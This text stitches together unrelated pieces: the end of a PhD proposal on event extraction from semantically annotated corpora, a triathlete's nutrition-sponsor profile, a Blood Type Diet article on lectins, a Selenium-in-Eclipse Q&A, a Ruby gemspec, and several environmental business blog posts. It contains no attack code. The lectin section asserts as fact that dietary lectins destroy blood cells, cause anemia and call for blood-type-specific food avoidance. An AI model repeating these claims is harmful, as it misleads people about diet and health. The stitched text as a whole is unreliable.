- Testing of past events can be done by extracting important topics from *Category* pages on various historical topics on *Wikipedia* [@wiki_past].
- Events in the future can be evaluated by using important infrastructure projects, engineering projects etc. These can be extracted from *Wikipedia* and other sources on the Internet.
- Current events extracted from *Wikipedia* [@wiki_current].
- Alternatively, we can manually construct a list of prominent events and extract relevant information such as named entities, geographical location, and time from ontologies such as: YAGO [@yago], Freebase [@freebase], etc.
- Diversifying and summarizing search events
- Biographies of eminent personalities, for example United States presidents [@wiki_potus].
- Historical timelines of various countries, for example for India [@wiki_timeline].
**Structure**. Each event in our test bed is then composed of a fact with an accompanying query. Formally, an entry in our testbed is thus a 5-tuple extracted from one of the aforementioned sources: $$\langle q,\mathcal{E}, g, t, \mathcal{W} \rangle$$
where $q$ consists of keyword query describing the event, $\mathcal{E}$ is a bag of participating entities, $g$ is the geographic location, $t$ is the time of its occurrence, and $\mathcal{W}$ are important terms describing the event.
**Metrics**. Based on the structure of the testbed of events, metrics such as *precision*, *recall* and *F$_1$* can be utilized to measure the effectiveness of the algorithms for detecting important events in semantically annotated corpora. How effectively the algorithm diversifies documents along multiple dimensions can be evaluated by metrics such as $\alpha$-nDCG [@diverse]. Quality of summaries can be measured by an automatic evaluation metric called *Rouge* [@rouge].
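For event detection, precision, recall, and F$_1$ reduce to simple set comparisons once the detected and ground-truth events are mapped to comparable identifiers. A minimal sketch, with invented event identifiers:

```python
def prf1(detected, truth):
    """Set-based precision, recall and F1 over event identifiers."""
    tp = len(detected & truth)
    precision = tp / len(detected) if detected else 0.0
    recall = tp / len(truth) if truth else 0.0
    f1 = (2 * precision * recall / (precision + recall)
          if precision + recall else 0.0)
    return precision, recall, f1

p, r, f = prf1({"beijing-2008", "london-2012", "paris-2024"},   # detected
               {"beijing-2008", "london-2012", "rio-2016"})     # ground truth
```

In practice, matching detected events to testbed facts would itself require the similarity functions discussed later, since two descriptions of the same event rarely share an exact identifier.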
Discussion
==========
\[sec:discussion\]
I briefly present some open technical challenges that I will address along with the research objectives in my PhD dissertation.
**Mathematical Models**. One key aspect that occurs in the design of the algorithms is that of computational models for named entities, geographical locations and temporal expressions. What would be the most descriptive mathematical models for each of these semantic annotations?
**Similarity Functions**. Given a pair of named entities, geographical locations, or temporal expressions, how can we efficiently compute the similarity between annotations of the same type?
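For temporal expressions normalized to intervals, one simple candidate similarity is the Jaccard overlap of the two intervals. This is only one of many possible choices, not a commitment of the dissertation:

```python
def interval_jaccard(a, b):
    """Jaccard overlap of two temporal intervals (begin, end)."""
    (a0, a1), (b0, b1) = a, b
    intersection = max(0, min(a1, b1) - max(a0, b0))
    union = max(a1, b1) - min(a0, b0)
    return intersection / union if union else 1.0  # two identical instants

sim = interval_jaccard((2008, 2012), (2010, 2016))  # overlap 2 over span 8
```

Analogous overlap measures could be defined for minimum bounding rectangles of geographical locations, while entity similarity would more likely rely on the type hierarchy of the ontology.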
**Efficiency & Scalability**. Identifying data structures for indexing corpora along with their semantic annotations, such that their asymptotic run times scale linearly with the size of the corpora.
**Evaluation**. Since evaluation of the solutions outlined is very subjective in nature, what are other reliable sources of objective ground truth? What other metrics can be employed to test the effectiveness of our methods?
Conclusion
==========
\[sec:conclusion\]
In this article I laid out an outline of the research work that I envisage carrying out for my PhD dissertation. In its culmination, the research would provide us with methods to computationally extract world history as a sequence of temporally ordered events and to project future events from semantically annotated corpora. The research would also provide ways to perform semantic search and large-scale event analytics on these annotated corpora. I further described already available resources that can be utilized for carrying out the research, test cases that can be built from encyclopedic resources on the Internet, and the metrics that can be utilized for evaluation.
[10]{} Clueweb’09. <http://www.lemurproject.org/clueweb09.php/>.
Clueweb’12. <http://www.lemurproject.org/clueweb12.php/>.
English gigaword. <https://catalog.ldc.upenn.edu/LDC2003T05>.
New York Times annotated corpus. <https://catalog.ldc.upenn.edu/LDC2008T19>.
Abujabal A. and Berberich K. Important events in the past, present, and future. WWW’15 Companion Volume.
Agrawal R. et al. Diversifying search results. WSDM’09.
Allan J., editor. . Kluwer Academic Publishers, Norwell, MA, USA, 2002.
Baeza-Yates R. Searching the future. SIGIR’05 Workshop MF/IR.
Bast H. and Buchhold B. An index for efficient semantic full-text search. CIKM’13.
Berberich K. et al. A language modeling approach for temporal information needs. ECIR’10.
Berberich K. and Bedathur S. Temporal diversification of search results. TAIA’13.
Bollacker K. et al. Freebase: A collaboratively created graph database for structuring human knowledge. SIGMOD’08.
Chang A. X. and Manning C. D. : A library for recognizing and normalizing time expressions. LREC’12.
Ringgaard M. et al. Facc1: Freebase annotation of clueweb corpora, version 1 (release date 2013-06-26, format version 1, correction level 0), June 2013. <http://lemurproject.org/clueweb12/>.
Gupta D. and Berberich K. Temporal query classification at different granularities. SPIRE’15.
Han J. et al. . Morgan Kaufmann Publishers Inc., San Francisco, CA, USA, 3rd edition, 2011.
Hoffart J. et al. AESTHETICS: analytics with strings, things, and cats. CIKM’14.
Hoffart J. et al. STICS: searching with strings, things, and cats. SIGIR’14.
Hoffart J. et al. Robust disambiguation of named entities in text. EMNLP’11.
Jatowt A. and Yeung C. A. Extracting collective expectations about the future from large text collections. CIKM’11.
Jones R. and Diaz F. Temporal profiles of queries. , 25(3), July 2007.
Kanhabua N. and N[ø]{}rv[å]{}g K. Determining time of queries for re-ranking search results. ECDL’10.
Ling X. and Weld D. S. Temporal information extraction. AAAI’10.
Michel J. B. et al. Quantitative analysis of culture using millions of digitized books. Science’10.
Nguyen T. N. and Kanhabua N. Leveraging dynamic query subtopics for time-aware search result diversification. ECIR’14.
Radinsky K. et al. Learning to predict from textual data. , 45:641–684, 2012.
Samet H. et al. Reading news with maps by exploiting spatial synonyms. , 57(10):64–77, 2014.
Str[ö]{}tgen J. and Gertz M. Event-centric search and exploration in document collections. JCDL’12.
Strötgen J. and Gertz M. Multilingual and cross-domain temporal tagging. , 47(2):269–298, 2013.
Suchanek F. M. et al. Yago: A large ontology from wikipedia and wordnet. , 6(3):203–217, September 2008.
Swan R. C. and Allan J. Automatic generation of overview timelines. SIGIR’00.
Wikipedia. List of presidents of the united states — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/List_of_Presidents_of_the_United_States>.
Wikipedia. List of years — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/List_of_years>.
Wikipedia. List of years in india — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/List_of_years_in_India>.
Wikipedia. Portal:contents/history and events — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/Portal:Contents/History_and_events>.
Wikipedia. Portal:current\_events — [W]{}ikipedia[,]{} the free encyclopedia, 2015. <https://en.wikipedia.org/wiki/Portal:Contents/History_and_events>.
Wikipedia. [W]{}ikipedia[,]{} the free encyclopedia, 2015. <http://en.wikipedia.org/>.
Yeung C. A. and Jatowt A. Studying how the past is remembered: towards computational history through large scale text mining. CIKM’11.
Lin C. Y. Rouge: a package for automatic evaluation of summaries. ACL-04 workshop.
[^1]: <http://www.bbc.com/sport/0/athletics/34032366>
Monday, June 20, 2016 1:43:00 PM America/New_York
Gold Medalist at both Pan-Pacific and Pan-American Games in the 200 m backstroke.
Dede Griesbauer is an INFINIT athlete out of Boulder, CO. Dede grew up a competitive swimmer, setting multiple national records for her high school. She went on to compete at Stanford University, where she continued to succeed. She won 10 NCAA All-American awards and captained the team for the 1992 season, during which she led the team to a National Championship title. From 1989-1994, Dede was also a member of the US National Swim Team, during which time she earned gold at both the Pan-Pacific and Pan-American Games and competed at two U.S. Olympic trials.
In 1994, Dede decided to retire from swimming to enter graduate school at the Wharton School at the University of Pennsylvania. She went on to pursue a financial career on Wall Street. While balancing both career and sport in 2004, Dede competed as an amateur and took first place in every one of her “in season” races. Unfortunately, at the Ironman World Championships an Achilles injury kept her off the podium.
After eight years as an equity trader, Dede had worked her way up to Vice President of an investment firm, but in 2005, she decided to step away from her investment career and return to a career as an athlete.
In 2006, Dede got her first major victory during only her second year as a pro. She took first place at Ironman UK, setting a new course record, and started gaining attention from sponsors and the rest of the racing community.
Since 2007, Dede has been working with INFINIT Nutrition, using a custom formula on the bike, and INFINIT’s Napalm for the run...
“I can’t take credit here. INFINIT Founder and CEO, Michael Folan created my formula for me! In a brief phone conversation, where we discussed some of my nutritional short comings in Ironman races (for me, it was bloating, while simultaneously bonking at mile 16 of the marathon in an Ironman), Michael created a formula for me, all the way back in 2007. To this day, minus some tinkering with flavor options, and adding caffeine I haven’t touched the formula one bit.”
"The right number of calories per hour in the right mixture of carbs, a flavor that I love, and a kick of caffeine that I use in the second half of the bike. I adjust my electrolyte slider based on race conditions. It's just that easy..."
All living things manufacture sugars on their surfaces, and sometimes these sugars are also secreted in free form as a type of protective coating. Good examples of these free sugars are the algae slimes found on top of stagnant water and our own mucus secretions. Among the tens of thousands of different complex sugars produced by the cell for use in signaling and recognition is one that determines ABO blood group.
Like the other surface sugars, blood group antigens telescope out from the cell wall, and are found principally in the blood stream and digestive tract. While they are attached to the cell wall, they are not fixed in place. Rather, they move around the cell’s surface. Sticking out the way they do, in a world of things reacting with one blood group or another, it would seem inevitable that they would get tangled up with things. Most of the time these are agglutination-type reactions.
Living things manufacture agglutinins in a great variety of shapes and forms, and they don’t share any real characteristics other than the ability to clump sugars together.
Lectins
Lectins are similar to a selective Velcro, a powerful way for organisms in nature to attach themselves to other organisms in nature. This natural Velcro comes in two varieties, one-sided and two-sided. The one-sided variety just gets stuck on things. Lots of germs, and even our own immune systems, use the one-sided variety all the time. Cells in the bile ducts of the liver have lectins on their surfaces to help them snatch up bacteria and parasites. Bacteria and other microbes have lectins on their surfaces that work rather like suction cups so that they can attach to the slippery mucus linings of the body. Sometimes the lectins that viruses or bacteria use can be blood group specific, making the microbe a stickier pest for a person of the favored blood group.
Two-sided lectins stick other cells together, like two tennis balls stuck together by a piece of two-sided Velcro. Think of the fuzz on the tennis ball as the assortment of sugars (including one that determines blood group) that line the surface of the cell.
The degree that lectins stick to cells is mostly determined by the amount of glycoconjugates (or degree of glycosylation) that a particular tissue has. The cells lining the small intestine wall, for example, are typically very glycosylated, and thus less able to bind lectins. Yet it is not just the amount of glycoconjugates that determines the reactivity of dietary lectins. Remember that lectins are very choosy about what they deign to attach to, and their criteria are highly individualized.
Factors influencing glycosylation in the intestines, and hence the activity of dietary lectins, include age, health and blood type, among others.
Lectins and Their Species
Lectins are always specific to the species from which they are derived. The lectin found in wheat, for example, differs from the lectin found in soy: it has a different shape and attaches to a different combination of sugars. Lectins are most widely distributed in plants. Particularly abundant in legumes, they account for between 2% and 3% of the total protein content of soybeans, lentils, and peanuts. The second most common source of lectins is seafood, particularly eel, shellfish, snails, halibut, and flounder.
Because they are commonly found in grains, seafood, legumes, and vegetables, lectins are widely abundant in the typical diet. Even tiny amounts of a lectin will suffice to clump huge numbers of cells.
Although many lectins are destroyed by normal cooking, many are not. The lectin found in wheat germ can resist heating at 100°C (212°F) for 30 minutes. Other food lectins known to resist destruction by cooking include those in apples, carrots, wheat bran, canned corn, pumpkin seeds, bananas, and wheat flour. The clumping ability of banana agglutinin is actually enhanced by heating. Researchers have also noted high levels of lectin activity in dry-roasted peanuts and certain processed breakfast cereals. Lectins from kidney beans can resist mild cooking and retain their activity even at 90°C (194°F) for 3 hours. Presoaking the beans, however, results in complete loss of lectin activity.
Many lectin-containing foods evade cooking because they are normally eaten raw, such as tomatoes, now the primary vegetable source of vitamins and minerals in the U.S. diet. Unlike most lectins, which usually react with only one blood group or another, tomato lectin is a panagglutinin; it is able to attach itself with equal ease to the cells of all blood groups. The average American consumes around 200 milligrams of lectins per year from tomatoes alone, and many other salad ingredients are rich in lectins.
Studies show that up to 5% of the ingested dietary lectins are absorbed into the bloodstream. There they can clump and bind to red and white blood cells, destroying them. It has been proposed that much of the low-grade anemia seen in Third World countries may be caused by the destruction of red blood cells from lectin-rich grain and bean diets. However, the actions of food lectins on the digestive tract are probably much more potent. Here they can cause inflammation of the mucus linings, and mimic many of the symptoms of food allergies.
Lectins and Blood Groups
As mentioned earlier, lectins can be blood group specific, that is, able to agglutinate the cells of one ABO type but not those of another. Lima bean lectin agglutinates cells of human group A but not those of O or B. The seeds of Lotus tetragonolobus (asparagus-pea) can agglutinate group O specifically, and Bandeiraea simplicifolia can agglutinate group B. The specificity of lectins is so sharply defined that they can even differentiate among blood subgroups. In fact, until Dolichos biflorus (horse gram) lectin was shown to react more vigorously with some A cells than others, we did not know that there were two varieties of A: A1 and A2. Lectins can distinguish other blood groups as well, such as M and N types, and can help determine secretor status.
The following chart highlights the foods that contain lectins specific to each blood type, which should be avoided.
Blood Group Diet
Lectins have an effect on bodily systems such as digestion, joint health, immune function and metabolism. Following an individualized diet such as the Blood Type Diet, the GenoType Diet, or a personalized SWAMI Diet provides optimal lectin-blocking nutrition and offers protection against the negative effects of dietary lectins.
Disclaimer: The content is purely informative and educational in nature and should not be construed as medical advice. Please use the content only in consultation with an appropriate certified medical or healthcare professional.
Dr. Peter D’Adamo is a naturopathic physician and the author of the NY Times best seller, Eat Right 4 Your Type, which advanced the idea that blood types play a vital role in optimal health and well-being. Dr. D’Adamo is the founder of the Center of Excellence in Generative Medicine at the University of Bridgeport in CT, and he serves as a Distinguished Professor of Clinical Studies at the University of Bridgeport College of Naturopathic Medicine.
Q:
Unable to launch Selenium with Python in Eclipse
I'm getting Unresolved import: webdriver
Found at: selenium.webdriver.__init__
2.44.0 issue when I'm trying to launch Selenium with Python in Eclipse.
My sample code
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver = webdriver.Firefox()
driver.get("http://www.python.org")
driver.close()
Using Python 2.7 , Pydev 2.2
Installed Selenium through PIP
pip install selenium
Downloading/unpacking selenium
Running setup.py (path:c:\users\ajay_t~1\appdata\local\temp\pip_build_ajay_talpur\selenium\setup.py) egg_info for package selenium
Installing collected packages: selenium
Running setup.py install for selenium
Successfully installed selenium
When updating Packages
pip install -U selenium
Requirement already up-to-date: selenium in c:\python27\lib\site-packages
What else have I missed? Please tell me so that I can start execution.
A:
Please update the PATH environment variable by adding the Python directory and the site-packages directory, then retry: C:\Python27\Scripts;C:\Python27\Lib\site-packages;
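A quick way to diagnose this class of problem (a sketch, not specific to any PyDev version) is to ask Python itself which interpreter is running and whether selenium is importable from it. The interpreter PyDev is configured with must be the same one that pip installed into:

```python
import sys

# The interpreter path PyDev is configured with must match this value;
# otherwise packages installed via pip are invisible inside Eclipse.
print(sys.executable)

# Probe for selenium without crashing if it is absent.
try:
    import selenium
    print("selenium", selenium.__version__)
except ImportError:
    print("selenium is not installed for this interpreter")
```

If the printed path differs from the interpreter configured in Eclipse (Window > Preferences > PyDev > Interpreters), point PyDev at that interpreter and re-run.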
# frozen_string_literal: true
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'interferon/version'
Gem::Specification.new do |gem|
gem.name = 'interferon'
gem.version = Interferon::VERSION.dup
gem.authors = ['Igor Serebryany', 'Jimmy Ngo']
gem.email = ['igor.serebryany@airbnb.com', 'jimmy.ngo@airbnb.com']
gem.description = %(: Store metrics alerts in code!)
gem.summary = %(: Store metrics alerts in code!)
gem.homepage = 'https://www.github.com/airbnb/interferon'
gem.licenses = ['MIT']
gem.files = `git ls-files`.split($INPUT_RECORD_SEPARATOR)
gem.executables = gem.files.grep(%r{^bin/}).map { |f| File.basename(f) }
gem.test_files = gem.files.grep(%r{^(test|spec|features)/})
gem.add_runtime_dependency 'aws-sdk', '~> 1.35', '>= 1.35.1'
gem.add_runtime_dependency 'diffy', '~> 3.1.0', '>= 3.1.0'
gem.add_runtime_dependency 'dogapi', '~> 1.27', '>= 1.27.0'
gem.add_runtime_dependency 'dogstatsd-ruby', '~> 1.4', '>= 1.4.1'
gem.add_runtime_dependency 'nokogiri', '~> 1.8', '>= 1.8.2'
gem.add_runtime_dependency 'parallel', '~> 1.9', '>= 1.9.0'
gem.add_runtime_dependency 'psych', '~> 2.0'
gem.add_runtime_dependency 'tzinfo', '~> 1.2.2', '>= 1.2.2'
gem.add_development_dependency 'pry', '~> 0.10'
gem.add_development_dependency 'rspec', '~> 3.2'
gem.add_development_dependency 'rubocop', '~> 0.56.0'
end
A hearse driver and a funeral director made a pit stop on their way to a funeral service, leaving the body and coffin of the veteran they were transporting in the hearse in the parking lot while they took a coffee break. Both employees were fired for this thoughtless and disrespectful move when it was brought to the attention of Veterans Funeral Care, the funeral home they worked for.
Twenty-five years after McDonald’s, working with the Environmental Defense Fund, agreed to get rid of foam clamshells for its burger–in what is now called the first corporate environmental partnership–the problem of wasteful, polluting, throwaway packaging is, if not worse than ever, no better.
While industry leaders like McDonald's, Starbucks, PepsiCo and Coca-Cola have invested in more sustainable packaging, others have failed to follow. That is the conclusion of a thorough packaging study released last week by As You Sow and the Natural Resources Defense Council that I covered for the Guardian.
Here’s how my story begins:
Big brands, including Burger King, Dunkin Donuts, KFC, Kraft Foods and MillerCoors, are wasting billions of dollars worth of valuable materials because they sell food and drinks in subpar packaging, according to a comprehensive new report on packaging and recycling by the fast food, beverage, consumer goods and grocery industries.
The 62-page rank-‘em-and-spank-‘em study, Waste and Opportunity 2015, was published Thursday by advocacy nonprofits As You Sow and the Natural Resources Defense Council. They found that few companies have robust sustainable packaging policies or system-wide programs to recycle packages. Indeed, no company was awarded their highest rating of “best practices.”
The environmental groups did identify a number of leaders, albeit flawed ones. In the beverage industry, New Belgium Brewing, Coca-Cola, Nestlé Waters and PepsiCo won praise. Starbucks and McDonald’s are said to be a cut above their competitors in fast food and quick-serve restaurants. As for consumer goods companies and grocery stores, the report offers qualified praise for Walmart, Procter & Gamble, Colgate-Palmolive and Unilever.
Broadly, though, this study paints a discouraging picture. What progress has been made is incremental and spotty, not comprehensive. As often as not, single-use packages of food and drinks are made from virgin materials and then tossed in the trash.
As the report notes, with an overall recycling rate of 34.5% and an estimated packaging recycling rate of 51%, the United States lags behind many other developed countries. Less than 14% of plastic packaging — the fastest-growing form of packaging — is recycled. Recyclable post-consumer packaging with an estimated market value of $11.4bn is wasted annually.
The interesting question is, what have we learned from NGO and government efforts to curb packaging waste and pollution? I’m not quite ready to give up on voluntary corporate efforts–not yet, anyway. Walmart reduced packaging across its global supply chain by 5 percent between 2006 and 2013; that’s a big deal. It’s now pushing suppliers to use more recycled content.
An alternative approach is increased government regulations–deposit bills on bottles and, more recently, plastic bag bans and taxes. (New York City has just banned polystyrene packaging, joining 100 other jurisdictions, reports Mark Bittman.) But these are also halfway measures.
Bolder would be an economy-wide effort to impose Extended Producer Responsibility (EPR) rules, which are in place in much of the EU. I don’t know enough about how these work and what they cost to have an informed opinion.
I did buy a set of headphones for my iPhone the other day and had the hardest time getting them out of the ridiculous plastic package. Surely a company that’s as good at design as Apple can do better. But what’s the incentive for them to do so? Saving a few pennies from a $29.95 (!) set of headphones clearly isn’t enough.
The renewable energy and clean tech industries let loose a collective sigh of relief today. President Obama’s re-election means they still have a friend in the White House.
“Clean energy was a big winner yesterday,” said Frances Beinecke, president of the Natural Resources Defense Council. “American voters not only re-elected a president who made green jobs a cornerstone of his first term and his campaign, they also rejected some of the shrillest champions of Big Oil and Big Coal.”
As Nick Robins, HSBC’s climate research analyst, said today:
Obama’s victory essentially protects key climate policies from repeal, particularly the regulation of carbon dioxide by the EPA, most notably in the power and auto sectors. It also offers the chance of extending the Production Tax Credit for wind energy when it expires at the end of this year.
True enough, but the today’s inefficient, hodge-podge collection of EPA rules, clean-energy subsidies and state mandates — while better than nothing — is no substitute for a rational economy-wide policy to deal with climate change.
Could this election usher in a carbon tax or cap-and-trade regulations to limit global warming pollution? That’s impossible to know, but there’s no evidence that climate action has climbed to the top of the president’s to-do list.
Obama made a passing reference to climate change in his acceptance speech, saying: “We want our children to live in an America that isn’t burdened by debt, that isn’t weakened by inequality, that isn’t threatened by the destructive power of a warming planet.”
But his all-but-absolute silence about global warming during the campaign means that he has no mandate from voters to act on the issue. Worse, he has made close to zero effort to persuade Americans that the issue matters, a failure that will surely cast a shadow over his legacy if it isn’t rectified during a second term.
To see what’s next for climate and green business after the election, I reached out to some smart people in the business world and in Washington to see what opportunities, if any, they see.
The first, and maybe the best, opening will arise when the president and the lame-duck Congress face the so-called fiscal cliff in the next 60 days. The government will need revenue to avoid painful spending cuts and tax increases, and a tax on carbon emissions could become an option.
Last December, government officials, corporate executives and activists met in Durban, South Africa, for high-level climate talks. They went home with an agreement … to keep talking. Meanwhile, we’re emitting more carbon dioxide every year, and atmospheric concentrations of greenhouse gases are steadily rising. If CO2 levels were somehow to stabilize now–they won’t–the world will keep warming. The bottom line: Climate change is inevitable. The world needs to learn how to prepare for it.
Increasingly, smart businesses are starting to do just that. Utilities, the oil and gas industry, agricultural companies and insurers are building assumptions about rising temperatures and extreme weather events into their scenario planning. This is what’s being called climate adaptation or climate preparedness.
The payoff from investing in adaptation could be substantial. In 2011, insured losses in the U.S. from natural catastrophes, including tornadoes, floods and hurricanes, topped $105 billion, breaking the record of $101 billion set in 2005, the year of Hurricane Katrina, according to Munich Re, the world's largest reinsurance firm. Some of those losses had nothing to do with climate change, but others did.
Happy New Year! And good riddance to 2011, a year during which we made little or no progress on some of the issues that I care most about: climate change, the long-term federal debt, social mobility (aka the American dream), and our dysfunctional Congress. Yet I remain an optimist.
Texas drought 2011
I could write many words about our woes. Instead, I'll try to be succinct. On the climate issue, global emissions of carbon dioxide from fossil-fuel burning jumped by the largest amount on record in 2010, we learned recently, and 2011 surely brought further increases. Concentrations of CO2 are 39% above where they were at the start of the industrial era and approaching the point when some scientists say it will be nearly impossible to contain global warming, the Guardian reports. Neither the US nor the UN moved closer to regulating CO2. In a discouraging development, Republicans Mitt Romney and Newt Gingrich backed away from their once-sensible support of greenhouse gas regulation, in what can only be seen as shameless pandering to the know-nothing wing of the Republican Party. Discouraging, too, was the Fukushima nuclear disaster, which will slow down the growth of carbon-free nuclear power. So will the failure of Solyndra. Meanwhile, the U.S. suffered massive flooding of the Mississippi and Missouri Rivers, a terrible drought in Texas, record wildfires and at least 2,941 monthly weather records that were broken by extreme events, according to the NRDC. Coincidence? Uh, no.
Like the atmospheric concentrations of CO2, the federal budget deficit has been growing. That's no coincidence either. We're living beyond our means, whether by burning fossil fuels or taxpayer dollars, and sticking future generations with the cleanup bill. Just last week, the White House asked for a $1.2 trillion increase in the federal debt limit, raising it to about $16.4 trillion. According to Marketplace Radio, that amounts to about $52,000 for every American. For a typical family of four, that's bigger than the mortgage.
In the midst of the madness of black Friday, and this weekend of American consumerism run amok, come a few wise words from the outdoor retailer Patagonia.
In a full-page ad in the New York Times, the privately held company asks shoppers to think more carefully about what they purchase, and the real cost of all the things we buy.
The headline: Don’t Buy This Jacket
“We ask you to buy less and to reflect before you spend a dime on this jacket or anything else,” the company says.
The rest of the ad is worth reading, and thinking about, so I’ll copy the text here:
It’s Black Friday, the day in the year retail turns from red to black and starts to make real money. But Black Friday, and the culture of consumption it reflects, puts the economy of natural systems that support all life firmly in the red. We’re now using the resources of one-and-a-half planets on our one and only planet.
Because Patagonia wants to be in business for a good long time – and leave a world inhabitable for our kids – we want to do the opposite of every other business today. We ask you to buy less and to reflect before you spend a dime on this jacket or anything else.
Technological progress is impossible to predict, but it’s safe bet that we won’t be flying solar- or wind-powered airplanes anytime soon. So the best hope of flying without emitting large volumes of greenhouse gases lies with biofuels.
This week, there’s good news on bringing biofuels in the air. Beginning Wednesday, Alaska Airlines will fly 75 commercial passenger flights in the U.S. powered in part by biofuels. “This is a historic week for aviation,” declared Alaska Air’s CEO, Bill Ayer, in a press release. Today (Nov. 7), United Airlines make the first U.S. commercial flight using an advanced biofuel made from algae, according to Reuters.
Keith Loveless, vice president of corporate and legal affairs, who oversees sustainability, told me: “These fuels will make a meaningful contribution towards reducing the aviation industry’s environmental impact, and towards reducing fuel volatility, which is an incredible problem for the airline industry.”
But–and you knew there would be a but–biofuels remain way too expensive to replace jet fuels today. That's why Tom Vilsack, the agriculture secretary, got on the phone with me last week to say that the Obama administration will do all it can to advance progress on aviation biofuels. "We are engaged right now in aggressively promoting research to determine the most efficient non-food feed crop that can be used," he said.
“Americans actually do care about their health. They don’t want their kids have to be poisoned in order for them to get a job. They value their natural heritage.”
“One should not read what’s going on the House of Representatives as an indication of where America wants to be.”
That’s Peter Lehner talking. Peter, a 52-year-old environmental lawyer, is executive director of the Natural Resources Defense Council, one of America’s most important environmental groups. The NRDC has a $95 million budget, about 400 employees and about 1.3 million members. They’re big and they represent a lot of people.
And yet the NRDC and its allies are getting nowhere in Washington.
They’re struggling to protect the EPA against unrelenting Republican attacks.
And, as Elizabeth Rosenthal wrote the other day in the Times, climate change–arguably the biggest problem facing mankind–has devolved into a non-issue. The “fading of global warming from the political agenda is a mostly American phenomenon,” she wrote.
Why?
That was the question on my mind when I met recently with Peter, who is thoughtful and smart, to talk about the politics of climate. That’s not my specialty, but I came with an idea: The green groups that try to persuade Americans that environmental protection is good for their jobs and pocketbooks–that is, that green is in our self-interest–have missed opportunities to frame the environment and especially climate as moral issues, in ways that would appeal to our higher and better selves. Put another way, the big NGOs that focus on policy are not as comfortable talking about culture and religion.
So I wondered what the NRDC had learned from the failure of cap-and-trade—the scheme to regulate greenhouse gas emissions that was rejected by Congress—and whether its leaders are rethinking their message.
The hearing was titled "How Obama's Green Energy Agenda is Killing Jobs." That was before the testimony began.
No matter that chief inquisitor Darrell Issa, who now denounces clean energy subsidies, once sought a loan guarantee for Aptera, an electric car maker that wanted to set up shop in his district. Dan Burton, the No. 2 Republican on the panel, supported a federal guarantee for Abound Solar, a company in his district.
What hypocrisy.
Democrats are little better, particularly as they blather on about green jobs. Sure, when Washington subsidizes clean energy, jobs may be created. The thing is, when the government subsidizes anything (oil exploration, ethanol, high fructose corn syrup, home ownership), you get more of it, and more jobs. Does this mean that market-distorting subsidies are an efficient way to create jobs? The question answers itself.
[By the way, there was some amusing back-and-forth at the hearing about what constitutes a green job. It turns out that bus drivers, whether they are driving hybrid buses or not, are doing "green jobs" because mass transport is greener than driving, my friend Matthew Wald reports in The Times.]
So what, if anything, can we learn from Solyndra's failure? Should the government stop financing clean energy, as some Republicans say? Or preserve today's subsidies, as the industry would like?
So we already knew that watching too much TV dulls the mind and costs a bundle (my cable bill’s $170 a month, including Internet and phone).
Now we know, thanks to a new report from the Natural Resources Defense Council, that your super-snazzy set-top box and DVR combo that means you will never have to miss another episode of Two Men and a Baby is costing you more money, wasting energy and generating carbon emissions.
With more than 80% of Americans now subscribing to cable, the numbers, taken as a whole, grow pretty big, the NRDC says:
In 2010, the electricity required to operate all U.S. set-top boxes was equal to the annual household electricity consumption of the entire state of Maryland, resulted in 16 million metric tons of carbon dioxide emissions, and cost households more than $3 billion.
They aren’t as startling on a house-by-house basis–each box, on average, costs about $18.75 a year to operate, depending on local electricity prices. But much of that money, it turns out, is wasted. About two-thirds of the energy consumed by the set-top is used when no one is watching TV or recording programs.
In a press release, NRDC’s efficiency guru, Noah Horowitz, says:
Set-top boxes are the ultimate home energy vampires, silently sucking significant amounts of energy and money when nobody’s using them. The consumer, who pays the electric bill, deserves technologies without hidden costs.
The biggest finding from our field work was that the only way to really turn these boxes off is to unplug them — not an attractive option. For almost all the boxes we tested, hitting the power button simply dims the clock or display. For a typical DVR, instead of consuming 30 Watts when on, the box used 29 Watts, only the difference of one Watt.
The problem here, as it is with many wasteful practices in the economy, is a split incentive between the owner and the user. (Economists call this a principal-agent problem.) It's the reason why a landlord doesn't care how inefficient an air conditioner is if the tenant pays the bill, and why few people dining out on an open-ended expense account pay much attention to the bill. In this case, the cable operator (Comcast, Time Warner) or phone company (Verizon, AT&T) that buys the set-top box doesn't pay the electric bill, and so they have no reason to design, build, buy or demand a more efficient box. Markets aren't working the way they should.
Today’s guest column comes from Amanda Little (née Griscom), one of my favorite writers on energy and the environment, and it’s on a very timely topic–the greening of sports. Amanda is the author of Power Trip: The Story of America’s Love Affair With Energy, and she was a long-time columnist for Grist.org and Salon.com. Amanda has also written for Outside, the New York Times Magazine, Vanity Fair, Rolling Stone, Wired, New York, InStyle, O Magazine and the Washington Post. She is the recipient of the Jane Bagley Lehman Award for excellence in environmental journalism. Amanda’s now blogging for Forbes.com, where this column originally appeared.
Why is it timely? Because just the other day, the Philadelphia Eagles unveiled plans to install solar panels, wind turbines and a co-generation plant at Lincoln Financial Field, making the stadium quite possibly the “greenest” in the sports. The gridiron goes off the grid, you could say. And if you think sports is a sandbox, with little impact on the “real world,” think again, about, say, Jackie Robinson’s influence on the civil rights movement. If you want to change the minds of people at the grass roots, about climate or energy or recycling, there’s no better place to start than with sports.
As the San Francisco Giants celebrate their 2010 World Series triumph, they’re quietly coveting another, humbler feat—one that’s perhaps no less historic in the long run. The Giants are one of the greenest teams in professional sports, and they’re proving that sustainable practices fatten the bottom line even as they ease the burdens on the planet.
Their stadium, AT&T Park, which accommodates about 45,000 fans, runs its scoreboard on solar power, recycles and composts nearly 50 percent of its waste, sources eco-friendly napkins, containers, utensils, toilet paper and the like, and has enough efficiency features to cut the stadium’s annual energy and water bills in half. That amounts to huge savings, given that stadiums can consume as much energy as small cities.
AT&T Park: Green in more ways than one
The Giants are on the front end of a trend that’s quickly gaining traction in major league baseball and throughout the NFL and NBA. Teams are stepping up recycling and efficiency in their facilities, attracting lucrative corporate sponsorships with green messaging, and raising consciousness among fans. If the trend continues to build in the next two years, we may find that games do more to push environmental progress in the U.S. than politics.
